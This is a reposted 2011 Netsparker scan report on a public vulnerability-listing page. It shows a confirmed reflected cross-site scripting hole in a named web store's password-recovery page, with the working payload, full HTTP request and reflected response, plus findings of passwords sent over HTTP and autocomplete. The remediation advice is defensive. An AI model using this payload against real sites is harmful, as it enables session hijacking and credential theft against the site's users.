XSS, growstats.com, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://growstats.com/order/help.php?section=P...
SCAN DATE
 6/20/2011 6:22:34 AM
REPORT DATE
 6/20/2011 6:27:50 AM
SCAN DURATION
 00:03:22

Total Requests

Average Speed

req/sec.
6
identified
4
confirmed
0
critical
1
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
33 %
LOW
50 %
INFORMATION
17 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/order/help.php username GET Cross-site Scripting Yes
Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
Apache Module Version Disclosure No
Frontpage Version Disclosure No
section GET Forbidden Resource Yes
Cross-site Scripting

Cross-site Scripting
1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /order/help.php

/order/help.php CONFIRMED

http://growstats.com/order/help.php?section=Password_Recovery_error&username=%22%20stYle=%22x:expre/..

Parameters

Parameter Type Value
section GET Password_Recovery_error
username GET " stYle="x:expre/**/ssion(alert(9))
email GET netsparker@example.com

Request

GET /order/help.php?section=Password_Recovery_error&username=%22%20stYle=%22x:expre/**/ssion(netsparker(9))%20&email=netsparker@example.com HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: growstats.com
Cookie: xid=31d8bb09bf9f72ce2494631e6747340b; store_language=en
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 11:23:24 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON CURa ADMa DEVa TAIa CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: xid=31d8bb09bf9f72ce2494631e6747340b; path=/order; domain=growstats.com; httponly,RefererCookie=deleted; expires=Sun, 20-Jun-2010 11:23:23 GMT; path=/order; domain=growstats.com; httponly
Last-Modified: Mon, 20 Jun 2011 11:23:24 GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Forgot password? :: Help zone :: GrowStats Store</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Language" content="en" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta name="description" content="Buy traffic for your website. Send up to 250,000 unique visitors to your site. The easiest and most reliable way to bring visitors to your website." /> <meta name="keywords" content="buy traffic, boost traffic, get visitors, website visitors, website hits, buy visitors, buy hits, get traffic, improve traffic, improve visitors, how to get visitors, website traffic" /> <script type="text/javascript"><!--var number_format_dec = '.';var number_format_th = ' ';var number_format_point = '2';var store_language = 'en';var xcart_web_dir = "/order";var images_dir = "/order/skin1/images";var lbl_no_items_have_been_selected = 'No items have been selected';var current_area = 'C';var currency_format = "$x";var lbl_product_minquantity_error = "Sorry, the minimum order quantity for this product is {{min}}.";var lbl_product_maxquantity_error = "Sorry, the maximum order quantity for this product is {{max}}.";var lbl_product_quantity_type_error = "You can specify a number from <span class=\"min-quantity\">{{min}}<\/span> to <span class=\"max-quantity\">{{max}}<\/span>.";var is_limit = false;--> </script> <script type="text/javascript" src="/order/skin1/common.js"></script> <script type="text/javascript" src="/order/skin1/jquery-min.js"></script> <script type="text/javascript" src="/order/skin1/jquery-fix.js"></script> <script type="text/javascript" src="/order/skin1/ajax.js"></script> <script type="text/javascript" src="/order/skin1/customer/fixes.js"></script><!--[if lt IE 7 ]><script type="text/javascript" src="/order/skin1/iepngfix.js"></script><![endif]--><!--[if IE ]><script type="text/javascript" src="/order/skin1/iepositioning_fix.js"></script><![endif]--><script type="text/javascript" src="/order/skin1/customer/dropout_buttons_init.js"></script> <link rel="stylesheet" type="text/css" href="/order/skin1/main.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE7.css" /> <![endif]--><script type="text/javascript"><!--if (/mozilla/.test(navigator.userAgent.toLowerCase()) && !/(compatible|webkit)/.test(navigator.userAgent.toLowerCase())) document.write('<link rel="stylesheet" type="text/css" href="/order/skin1/main.FF.css" />');--></script> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/Advanced_Order_Management/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/RMA/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE7.css" /> <![endif]--> <base href="http://growstats.com/order/" /> <script src="/order/skin1/anchor_fix.js" type="text/javascript"></script><script type="text/javascript">var userflyHost = (("https:" == document.location.protocol) ? "https://secure.userfly.com" : "http://asset.userfly.com");document.write(unescape("%3Cscript src='" + userflyHost + "/users/38634/userfly.js' type='text/javascript'%3E%3C/script%3E"));</script></head><body><div id="page-container"> <div id="page-container2"> <div id="content-container"> <div id="content-container2"> <div id="center"> <div id="center-main"> <!-- central space --> <table width="100%"><tr> <td valign="top" align="left"> <div id="location"> <a href="home.php" class="bread-crumb">GrowStats Store</a> <span>/</span> <a href="help.php" class="bread-crumb">Help zone</a> <span>/</span> <font class="bread-crumb last-bread-crumb">Forgot password?</font> </div> </td> <td width="130" valign="top" align="right"> </td></tr></table> <h1>Forgot password?</h1><p class="text-block">You can recover your lost account information using the form below. Please enter your valid email address (the one you used for registration), your account information will be mailed to you shortly.</p><div class="dialog noborder"> <div class="title"> <h2>Forgot password?</h2> </div> <div class="content"> <form action="help.php" method="post" name="processform"> <input type="hidden" name="action" value="recover_password" /> <table cellspacing="0" class="data-table"> <tr> <td class="data-name">Username</td> <td class="data-required">*</td> <td><input type="text" name="username" size="30" value="&quot; stYle=&quot;x:expre/**/ssion(netsparker(9)) " /></td> </tr> <tr> <td class="data-name">Email</td> <td class="data-required">*</td> <td> <input type="text" name="email" size="30" value="netsparker@example.com" /> <div class="error-message">Email address and login name do not match. Please correct.</div> </td> </tr> <tr> <td colspan="2">&nbsp;</td> <td class="button-row"> <button class="button" type="submit" title="Submit"> <span class="button-right"><span class="button-left">Submit</span></span> </button></td> </tr> </table> </form></div></div> <!-- /central space --> </div> </div> <div id="left-bar"> <div class="menu-dialog menu-categories-list"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Our Services</h2> </div> <div class="content"> <ul> <li><a href="http://growstats.com/order/Targeted-Traffic" title="Targeted Traffic">Targeted Traffic</a></li><br> <li><a href="http://growstats.com/order/Organic-Traffic" title="Organic Traffic">Organic Traffic</a></li> <img src="/order/skin1/images/new.gif"> </ul> </div></div> <script type="text/javascript" src="/order/skin1/jquery.tooltip.min.js"></script> <div class="menu-dialog menu-minicart empty"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2><span class="minicart"> <span class="empty"> <strong>Cart is empty</strong> </span> </span></h2> </div> <div class="content"> <ul> <li><a href="cart.php">View cart</a></li> <li><a href="cart.php?mode=checkout">Checkout</a></li> <li><a href="orders.php">Orders history</a></li> </ul> </div></div> <div class="menu-dialog menu-auth"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Your account</h2> </div> <div class="content"> <form action="http://growstats.com/order/include/login.php" method="post" name="authform" class="item"> <input type="hidden" name="xid" value="31d8bb09bf9f72ce2494631e6747340b" /> <input type="hidden" name="mode" value="login" /> <input type="hidden" name="usertype" value="C" /> <input type="hidden" name="redirect" value="customer" /><b>Register today for faster ordering, order history, discounts, and more!</b><br /><br /> Username<br /> <input type="text" name="username" size="17" value="" stYle="x:expre/**/ssion(netsparker(9)) " /><br /> Password<br /> <input type="password" name="password" size="17" maxlength="64" value="" /> <div class="login-buttons"> <button class="button menu-button" type="submit" title="Log in"> <span class="button-right"><span class="button-left">Log in</span></span> </button> <div class="button menu-button" title="Register" onclick="javascript: self.location = 'register.php'; if (event) event.cancelBubble = true;"> <a href="register.php" onclick="javascript: if (event) event.cancelBubble = true;">Register</a> </div> <div class="clearing"></div> </div> <div class="recovery"> <a href="help.php?section=Password_Recovery">Forgot password?</a> </div> </form> </div></div> <div align="center"><a href="//privacy-policy.truste.com/click-to-verify/www.growstats.com" target="_blank"><img style="border: none" alt="Privacy-Policy-By-TRUSTe" src="//privacy-policy.truste.com/verified-seal/www.growstats.com/green/h.png"/></a></div> </div> </div> </div> <div class="clearing">&nbsp;</div> <div id="header"> <table width="100%" height="132" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="72" valign="top" bgcolor="#FFFFFF" class="box_title" td><div align="center"> <table width="780" height="72" border="0" cellpadding="2" cellspacing="0"> <tr> <td width="215" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="left"><img src="/order/skin1/images/logo2.gif" width="210" height="68"></div></td> <td width="392" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"><strong>&quot;<em>Boost your website traffic</em>&quot;</strong> </div></td> <td width="161" height="72" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="center"><img src="/order/skin1/images/chatlive.gif" border="0" onClick="javascript:window.open('http://a2.websitealive.com/1884/rRouter.asp?groupid=1884&departmentid=0&websiteid=0','guest','width=575,height=490');" style="cursor:pointer"></td> </tr> </table> </div></td> </tr> </table> </div></td> </tr> <tr> <td height="27" valign="top" background="/order/skin1/images/menubg2.gif" class="box_title" td><table width="100%" height="27" border="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="center"> <table width="780" height="27" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="left"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><strong><a href="http://www.growstats.com/index.php" class="top_menu">Home</a></strong></span></font></span><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/howitworks.php" class="top_menu">How It Works</a></span></font><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/services.php" class="top_menu">Services</a></span></font></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><strong><span class="font4"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://growstats.com/order" class="top_menu"><strong>Order Now</strong></a></span></font></span></span></strong></span></strong><strong><span class="font4"><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/testimonials.php" class="top_menu">Testimonials</a></span></font></span></strong></span></strong></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align=..
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /order/help.php

/order/help.php CONFIRMED

http://growstats.com/order/help.php?section=Password_Recovery_error&username=&email=

Form target action

http://growstats.com/order/include/login.php

Request

GET /order/help.php?section=Password_Recovery_error&username=&email= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: growstats.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 11:22:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON CURa ADMa DEVa TAIa CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: xid=5a247fca79b14ddec1620b1efdf933b3; path=/order; domain=growstats.com; httponly,RefererCookie=deleted; expires=Sun, 20-Jun-2010 11:22:41 GMT; path=/order; domain=growstats.com; httponly,store_language=en; expires=Tue, 19-Jun-2012 11:22:42 GMT; path=/order; domain=growstats.com; httponly
Last-Modified: Mon, 20 Jun 2011 11:22:42 GMT
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Forgot password? :: Help zone :: GrowStats Store</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Language" content="en" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta name="description" content="Buy traffic for your website. Send up to 250,000 unique visitors to your site. The easiest and most reliable way to bring visitors to your website." /> <meta name="keywords" content="buy traffic, boost traffic, get visitors, website visitors, website hits, buy visitors, buy hits, get traffic, improve traffic, improve visitors, how to get visitors, website traffic" /> <script type="text/javascript"><!--var number_format_dec = '.';var number_format_th = ' ';var number_format_point = '2';var store_language = 'en';var xcart_web_dir = "/order";var images_dir = "/order/skin1/images";var lbl_no_items_have_been_selected = 'No items have been selected';var current_area = 'C';var currency_format = "$x";var lbl_product_minquantity_error = "Sorry, the minimum order quantity for this product is {{min}}.";var lbl_product_maxquantity_error = "Sorry, the maximum order quantity for this product is {{max}}.";var lbl_product_quantity_type_error = "You can specify a number from <span class=\"min-quantity\">{{min}}<\/span> to <span class=\"max-quantity\">{{max}}<\/span>.";var is_limit = false;--> </script> <script type="text/javascript" src="/order/skin1/common.js"></script> <script type="text/javascript" src="/order/skin1/browser_identificator.js"></script> <script type="text/javascript" src="/order/skin1/jquery-min.js"></script> <script type="text/javascript" src="/order/skin1/jquery-fix.js"></script> <script type="text/javascript" src="/order/skin1/ajax.js"></script> <script type="text/javascript" src="/order/skin1/customer/fixes.js"></script><!--[if lt IE 7 ]><script type="text/javascript" src="/order/skin1/iepngfix.js"></script><![endif]--><!--[if IE ]><script type="text/javascript" src="/order/skin1/iepositioning_fix.js"></script><![endif]--><script type="text/javascript" src="/order/skin1/customer/dropout_buttons_init.js"></script> <link rel="stylesheet" type="text/css" href="/order/skin1/main.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE7.css" /> <![endif]--><script type="text/javascript"><!--if (/mozilla/.test(navigator.userAgent.toLowerCase()) && !/(compatible|webkit)/.test(navigator.userAgent.toLowerCase())) document.write('<link rel="stylesheet" type="text/css" href="/order/skin1/main.FF.css" />');--></script> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/Advanced_Order_Management/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/RMA/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE7.css" /> <![endif]--> <base href="http://growstats.com/order/" /> <script src="/order/skin1/anchor_fix.js" type="text/javascript"></script><script type="text/javascript">var userflyHost = (("https:" == document.location.protocol) ? "https://secure.userfly.com" : "http://asset.userfly.com");document.write(unescape("%3Cscript src='" + userflyHost + "/users/38634/userfly.js' type='text/javascript'%3E%3C/script%3E"));</script></head><body><div id="page-container"> <div id="page-container2"> <div id="content-container"> <div id="content-container2"> <div id="center"> <div id="center-main"> <!-- central space --> <table width="100%"><tr> <td valign="top" align="left"> <div id="location"> <a href="home.php" class="bread-crumb">GrowStats Store</a> <span>/</span> <a href="help.php" class="bread-crumb">Help zone</a> <span>/</span> <font class="bread-crumb last-bread-crumb">Forgot password?</font> </div> </td> <td width="130" valign="top" align="right"> </td></tr></table> <h1>Forgot password?</h1><p class="text-block">You can recover your lost account information using the form below. Please enter your valid email address (the one you used for registration), your account information will be mailed to you shortly.</p><div class="dialog noborder"> <div class="title"> <h2>Forgot password?</h2> </div> <div class="content"> <form action="help.php" method="post" name="processform"> <input type="hidden" name="action" value="recover_password" /> <table cellspacing="0" class="data-table"> <tr> <td class="data-name">Username</td> <td class="data-required">*</td> <td><input type="text" name="username" size="30" value="" /></td> </tr> <tr> <td class="data-name">Email</td> <td class="data-required">*</td> <td> <input type="text" name="email" size="30" value="" /> <div class="error-message">Email address and login name do not match. Please correct.</div> </td> </tr> <tr> <td colspan="2">&nbsp;</td> <td class="button-row"> <button class="button" type="submit" title="Submit"> <span class="button-right"><span class="button-left">Submit</span></span> </button></td> </tr> </table> </form></div></div> <!-- /central space --> </div> </div> <div id="left-bar"> <div class="menu-dialog menu-categories-list"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Our Services</h2> </div> <div class="content"> <ul> <li><a href="http://growstats.com/order/Targeted-Traffic" title="Targeted Traffic">Targeted Traffic</a></li><br> <li><a href="http://growstats.com/order/Organic-Traffic" title="Organic Traffic">Organic Traffic</a></li> <img src="/order/skin1/images/new.gif"> </ul> </div></div> <script type="text/javascript" src="/order/skin1/jquery.tooltip.min.js"></script> <div class="menu-dialog menu-minicart empty"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2><span class="minicart"> <span class="empty"> <strong>Cart is empty</strong> </span> </span></h2> </div> <div class="content"> <ul> <li><a href="cart.php">View cart</a></li> <li><a href="cart.php?mode=checkout">Checkout</a></li> <li><a href="orders.php">Orders history</a></li> </ul> </div></div> <div class="menu-dialog menu-auth"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Your account</h2> </div> <div class="content"> <form action="http://growstats.com/order/include/login.php" method="post" name="authform" class="item"> <input type="hidden" name="xid" value="5a247fca79b14ddec1620b1efdf933b3" /> <input type="hidden" name="mode" value="login" /> <input type="hidden" name="usertype" value="C" /> <input type="hidden" name="redirect" value="customer" /><b>Register today for faster ordering, order history, discounts, and more!</b><br /><br /> Username<br /> <input type="text" name="username" size="17" value="" /><br /> Password<br /> <input type="password" name="password" size="17" maxlength="64" value="" /> <div class="login-buttons"> <button class="button menu-button" type="submit" title="Log in"> <span class="button-right"><span class="button-left">Log in</span></span> </button> <div class="button menu-button" title="Register" onclick="javascript: self.location = 'register.php'; if (event) event.cancelBubble = true;"> <a href="register.php" onclick="javascript: if (event) event.cancelBubble = true;">Register</a> </div> <div class="clearing"></div> </div> <div class="recovery"> <a href="help.php?section=Password_Recovery">Forgot password?</a> </div> </form> </div></div> <div align="center"><a href="//privacy-policy.truste.com/click-to-verify/www.growstats.com" target="_blank"><img style="border: none" alt="Privacy-Policy-By-TRUSTe" src="//privacy-policy.truste.com/verified-seal/www.growstats.com/green/h.png"/></a></div> </div> </div> </div> <div class="clearing">&nbsp;</div> <div id="header"> <table width="100%" height="132" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="72" valign="top" bgcolor="#FFFFFF" class="box_title" td><div align="center"> <table width="780" height="72" border="0" cellpadding="2" cellspacing="0"> <tr> <td width="215" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="left"><img src="/order/skin1/images/logo2.gif" width="210" height="68"></div></td> <td width="392" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"><strong>&quot;<em>Boost your website traffic</em>&quot;</strong> </div></td> <td width="161" height="72" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="center"><img src="/order/skin1/images/chatlive.gif" border="0" onClick="javascript:window.open('http://a2.websitealive.com/1884/rRouter.asp?groupid=1884&departmentid=0&websiteid=0','guest','width=575,height=490');" style="cursor:pointer"></td> </tr> </table> </div></td> </tr> </table> </div></td> </tr> <tr> <td height="27" valign="top" background="/order/skin1/images/menubg2.gif" class="box_title" td><table width="100%" height="27" border="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="center"> <table width="780" height="27" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="left"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><strong><a href="http://www.growstats.com/index.php" class="top_menu">Home</a></strong></span></font></span><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/howitworks.php" class="top_menu">How It Works</a></span></font><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/services.php" class="top_menu">Services</a></span></font></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><strong><span class="font4"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://growstats.com/order" class="top_menu"><strong>Order Now</strong></a></span></font></span></span></strong></span></strong><strong><span class="font4"><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/testimonials.php" class="top_menu">Testimonials</a></span></font></span></strong></span></strong></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font si..
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /order/help.php

/order/help.php CONFIRMED

http://growstats.com/order/help.php?section=Password_Recovery_error&username=&email=

Identified Field Name

password

Request

GET /order/help.php?section=Password_Recovery_error&username=&email= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: growstats.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 11:22:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON CURa ADMa DEVa TAIa CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: xid=5a247fca79b14ddec1620b1efdf933b3; path=/order; domain=growstats.com; httponly,RefererCookie=deleted; expires=Sun, 20-Jun-2010 11:22:41 GMT; path=/order; domain=growstats.com; httponly,store_language=en; expires=Tue, 19-Jun-2012 11:22:42 GMT; path=/order; domain=growstats.com; httponly
Last-Modified: Mon, 20 Jun 2011 11:22:42 GMT
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Forgot password? :: Help zone :: GrowStats Store</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Language" content="en" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta name="description" content="Buy traffic for your website. Send up to 250,000 unique visitors to your site. The easiest and most reliable way to bring visitors to your website." /> <meta name="keywords" content="buy traffic, boost traffic, get visitors, website visitors, website hits, buy visitors, buy hits, get traffic, improve traffic, improve visitors, how to get visitors, website traffic" /> <script type="text/javascript"><!--var number_format_dec = '.';var number_format_th = ' ';var number_format_point = '2';var store_language = 'en';var xcart_web_dir = "/order";var images_dir = "/order/skin1/images";var lbl_no_items_have_been_selected = 'No items have been selected';var current_area = 'C';var currency_format = "$x";var lbl_product_minquantity_error = "Sorry, the minimum order quantity for this product is {{min}}.";var lbl_product_maxquantity_error = "Sorry, the maximum order quantity for this product is {{max}}.";var lbl_product_quantity_type_error = "You can specify a number from <span class=\"min-quantity\">{{min}}<\/span> to <span class=\"max-quantity\">{{max}}<\/span>.";var is_limit = false;--> </script> <script type="text/javascript" src="/order/skin1/common.js"></script> <script type="text/javascript" src="/order/skin1/browser_identificator.js"></script> <script type="text/javascript" src="/order/skin1/jquery-min.js"></script> <script type="text/javascript" src="/order/skin1/jquery-fix.js"></script> <script type="text/javascript" src="/order/skin1/ajax.js"></script> <script type="text/javascript" 